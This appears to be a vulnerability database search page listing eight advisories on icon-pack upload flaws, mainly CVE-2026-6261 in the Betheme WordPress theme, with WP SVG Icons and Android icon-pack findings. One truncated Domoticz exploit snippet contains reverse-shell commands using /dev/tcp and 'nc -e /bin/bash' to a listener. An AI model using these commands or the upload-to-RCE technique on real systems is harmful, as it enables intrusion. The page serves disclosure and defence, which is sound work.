8 matches found
CVE-2026-6261 Betheme <= 28.4 - Authenticated (Author+) Arbitrary File Upload to Remote Code Execution via Icon Pack Upload
The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the uploadicons function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it...
CVE-2026-6261
The Betheme theme for WordPress (up to version 28.4) is vulnerable to Arbitrary File Upload via the upload_icons workflow. The root cause is that user-controlled ZIPs are moved and unzip’ed into a public uploads directory without validating extracted file types. Authenticated attackers with autho...
CVE-2026-6261 Betheme <= 28.4 - Authenticated (Author+) Arbitrary File Upload to Remote Code Execution via Icon Pack Upload
The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the uploadicons function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it...
CVE-2026-6261
The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the uploadicons function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it...
PT-2022-13482 · WordPress · Wp Svg Icons
Name of the Vulnerable Software and Affected Versions: WP SVG Icons WordPress plugin versions 3.2.3 and earlier Description: The issue allows a high-privileged user, such as an admin, to upload a zip file containing malicious PHP code, leading to remote code execution. This is due to the plugin n...
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Glim - Free Flat Icon Pack - Dangerous filesystem permissions, WebView code execution vulnerabilities
HackApp vulnerability scanner discovered that application Glim - Free Flat Icon Pack published at the 'play' market has multiple vulnerabilities...
Glasklart - Icon Pack - Base64 encoded String, Customized SSL, Exported ContentProvider vulnerabilities
HackApp vulnerability scanner discovered that application Glasklart - Icon Pack published at the 'play' market has multiple vulnerabilities...